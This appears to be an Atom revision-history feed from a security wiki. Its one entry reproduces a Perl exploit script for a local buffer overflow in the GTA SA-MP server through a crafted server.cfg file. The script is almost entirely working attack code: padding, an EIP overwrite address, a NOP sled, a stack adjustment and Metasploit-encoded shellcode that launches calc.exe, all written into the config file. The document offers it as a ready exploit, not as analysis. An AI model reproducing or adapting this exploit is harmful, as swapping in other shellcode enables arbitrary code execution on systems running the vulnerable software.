<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=GTA_SA-MP_server.cfg%E6%9C%AC%E5%9C%B0%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E</id>
	<title>GTA SA-MP server.cfg本地緩衝區溢出漏洞 - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=GTA_SA-MP_server.cfg%E6%9C%AC%E5%9C%B0%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=GTA_SA-MP_server.cfg%E6%9C%AC%E5%9C%B0%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E&amp;action=history"/>
	<updated>2026-04-13T20:07:59Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=GTA_SA-MP_server.cfg%E6%9C%AC%E5%9C%B0%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E&amp;diff=707&amp;oldid=prev</id>
		<title>Pwnwiki: Created page with &quot;==EXP== &lt;pre&gt; # GTA SA-MP server.cfg Local Buffer Overflow Vulnerability (0day) # Date: 9-26-11 # Author: Silent_Dream # Software Link: http://team.sa-mp.com/files/samp03csvr_...&quot;</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=GTA_SA-MP_server.cfg%E6%9C%AC%E5%9C%B0%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E&amp;diff=707&amp;oldid=prev"/>
		<updated>2021-03-27T03:15:44Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;==EXP== &amp;lt;pre&amp;gt; # GTA SA-MP server.cfg Local Buffer Overflow Vulnerability (0day) # Date: 9-26-11 # Author: Silent_Dream # Software Link: http://team.sa-mp.com/files/samp03csvr_...&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;==EXP==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# GTA SA-MP server.cfg Local Buffer Overflow Vulnerability (0day)&lt;br /&gt;
# Date: 9-26-11&lt;br /&gt;
# Author: Silent_Dream&lt;br /&gt;
# Software Link: http://team.sa-mp.com/files/samp03csvr_R2-2_win32.zip&lt;br /&gt;
# Tested on: XP SP3, Windows 7&lt;br /&gt;
# Thanks to: corelanc0d3r &amp;amp; team, Metasploit, Exploit-db.&lt;br /&gt;
&lt;br /&gt;
#No PPRs found (app compiled with safeseh on), so this exploit uses EIP overwrite instead.&lt;br /&gt;
#392 bytes max payload space (after this you hit SEH), 3 badchars: 0x1a, 0x0d, 0x0a.&lt;br /&gt;
&lt;br /&gt;
#Triggering Details: Overwrite server.cfg with this file, run samp-server.exe, boom calculator!&lt;br /&gt;
&lt;br /&gt;
my $file = &amp;quot;server.cfg&amp;quot;; #file must be named server.cfg for bug to trigger.&lt;br /&gt;
my $head = &amp;quot;echo &amp;quot;; #probably not needed, tweak if you want.&lt;br /&gt;
my $junk = &amp;quot;\x41&amp;quot; x 379;&lt;br /&gt;
my $eip = &amp;quot;\xaa\x9f\x42\x00&amp;quot;; #push esp/ret in samp-server.exe&lt;br /&gt;
my $nops = &amp;quot;\x90&amp;quot; x 12;&lt;br /&gt;
my $adjust = &amp;quot;\x81\xc4\x54\xf2\xff\xff&amp;quot;; #add esp, -3500&lt;br /&gt;
&lt;br /&gt;
my $shellcode =&lt;br /&gt;
#x86/shikata_ga_nai succeeded with size 227 (iteration=1)&lt;br /&gt;
#Metasploit windows/exec calc.exe -b '\x1a\x0d\x0a'&lt;br /&gt;
&lt;br /&gt;
&amp;quot;\xdb\xc3\xd9\x74\x24\xf4\xbe\xe8\x5a\x27\x13\x5f\x31\xc9&amp;quot; .&lt;br /&gt;
&amp;quot;\xb1\x33\x31\x77\x17\x83\xc7\x04\x03\x9f\x49\xc5\xe6\xa3&amp;quot; .&lt;br /&gt;
&amp;quot;\x86\x80\x09\x5b\x57\xf3\x80\xbe\x66\x21\xf6\xcb\xdb\xf5&amp;quot; .&lt;br /&gt;
&amp;quot;\x7c\x99\xd7\x7e\xd0\x09\x63\xf2\xfd\x3e\xc4\xb9\xdb\x71&amp;quot; .&lt;br /&gt;
&amp;quot;\xd5\x0f\xe4\xdd\x15\x11\x98\x1f\x4a\xf1\xa1\xd0\x9f\xf0&amp;quot; .&lt;br /&gt;
&amp;quot;\xe6\x0c\x6f\xa0\xbf\x5b\xc2\x55\xcb\x19\xdf\x54\x1b\x16&amp;quot; .&lt;br /&gt;
&amp;quot;\x5f\x2f\x1e\xe8\x14\x85\x21\x38\x84\x92\x6a\xa0\xae\xfd&amp;quot; .&lt;br /&gt;
&amp;quot;\x4a\xd1\x63\x1e\xb6\x98\x08\xd5\x4c\x1b\xd9\x27\xac\x2a&amp;quot; .&lt;br /&gt;
&amp;quot;\x25\xeb\x93\x83\xa8\xf5\xd4\x23\x53\x80\x2e\x50\xee\x93&amp;quot; .&lt;br /&gt;
&amp;quot;\xf4\x2b\x34\x11\xe9\x8b\xbf\x81\xc9\x2a\x13\x57\x99\x20&amp;quot; .&lt;br /&gt;
&amp;quot;\xd8\x13\xc5\x24\xdf\xf0\x7d\x50\x54\xf7\x51\xd1\x2e\xdc&amp;quot; .&lt;br /&gt;
&amp;quot;\x75\xba\xf5\x7d\x2f\x66\x5b\x81\x2f\xce\x04\x27\x3b\xfc&amp;quot; .&lt;br /&gt;
&amp;quot;\x51\x51\x66\x6a\xa7\xd3\x1c\xd3\xa7\xeb\x1e\x73\xc0\xda&amp;quot; .&lt;br /&gt;
&amp;quot;\x95\x1c\x97\xe2\x7f\x59\x67\xa9\x22\xcb\xe0\x74\xb7\x4e&amp;quot; .&lt;br /&gt;
&amp;quot;\x6d\x87\x6d\x8c\x88\x04\x84\x6c\x6f\x14\xed\x69\x2b\x92&amp;quot; .&lt;br /&gt;
&amp;quot;\x1d\x03\x24\x77\x22\xb0\x45\x52\x41\x57\xd6\x3e\xa8\xf2&amp;quot; .&lt;br /&gt;
&amp;quot;\x5e\xa4\xb4&amp;quot;;&lt;br /&gt;
&lt;br /&gt;
open($File, &amp;quot;&amp;gt;$file&amp;quot;);&lt;br /&gt;
print $File $head.$junk.$eip.$nops.$adjust.$shellcode;&lt;br /&gt;
close($FILE);&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>